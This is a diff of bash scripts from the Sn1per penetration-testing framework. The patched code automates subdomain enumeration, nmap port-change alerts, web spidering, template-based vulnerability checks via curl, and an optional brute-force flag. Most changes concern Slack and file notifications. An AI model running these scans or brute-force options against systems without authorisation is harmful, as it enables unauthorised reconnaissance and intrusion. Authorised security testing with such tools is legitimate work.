wc -l $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-full.txt >> $LOOT_DIR/scans/updated.txt 2> /dev/null
|
||||
#rm -f $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
diff $LOOT_DIR/domains/domains_old-$TARGET.txt $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/domains/domains_new-$TARGET.txt
|
||||
wc -l $LOOT_DIR/domains/domains_new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_DOMAINS_NEW" == "1" ]] && [[ -s "$LOOT_DIR/domains/domains_new-$TARGET.txt" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/domains/domains_new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED NEW SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wc -l $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null
|
||||
|
||||
if [[ $(wc -c $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS_DOMAINS_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/domains/domains_new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
echo -e "$RESET"
|
||||
if [[ "$STATIC_GREP_SEARCH" = "1" ]]; then
|
||||
|
|
@ -267,8 +275,8 @@ if [[ "$RECON" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
sniper -f $LOOT_DIR/domains/domains-$TARGET-full.txt -m flyover -w $WORKSPACE
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per recon scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per recon scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -5,12 +5,14 @@
|
|||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
|
||||
done
|
||||
|
|
@ -2,14 +2,16 @@
|
|||
echo -e "$OKRED RUNNING SC0PE NETWORK VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
for file in `ls $INSTALL_DIR/templates/passive/network/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
if [[ "$SEARCH" == "negative" ]]; then
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
else
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
if [[ "$SEARCH" == "negative" ]]; then
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
else
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
|
||||
done
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do
|
||||
|
|
|
|||
|
|
@ -6,24 +6,28 @@
|
|||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
else
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
if [[ $STATIC_GREP_SEARCH ]]; then
|
||||
if [[ $STATIC_GREP_SEARCH == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -5,7 +5,7 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
if [[ "$OSINT" = "1" ]]; then
|
||||
args="$args -o"
|
||||
fi
|
||||
if [[ "$AUTOBRUTE" = "1" ]]; then
|
||||
if [[ "$AUTO_BRUTE" = "1" ]]; then
|
||||
args="$args -b"
|
||||
fi
|
||||
if [[ "$FULLNMAPSCAN" = "1" ]]; then
|
||||
|
|
@ -30,9 +30,9 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
args="$args --noreport -m stealth"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
|
|
@ -95,7 +95,6 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
#dnsenum -f $INSTALL_DIR/wordlists/vhosts.txt --noreverse $TARGET 2> /dev/null
|
||||
mv -f *_ips.txt $LOOT_DIR/ips/ 2>/dev/null
|
||||
if [[ $SCAN_TYPE == "DOMAIN" ]];
|
||||
then
|
||||
|
|
@ -130,11 +129,13 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$HTTP_PROBE" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -248,10 +249,12 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
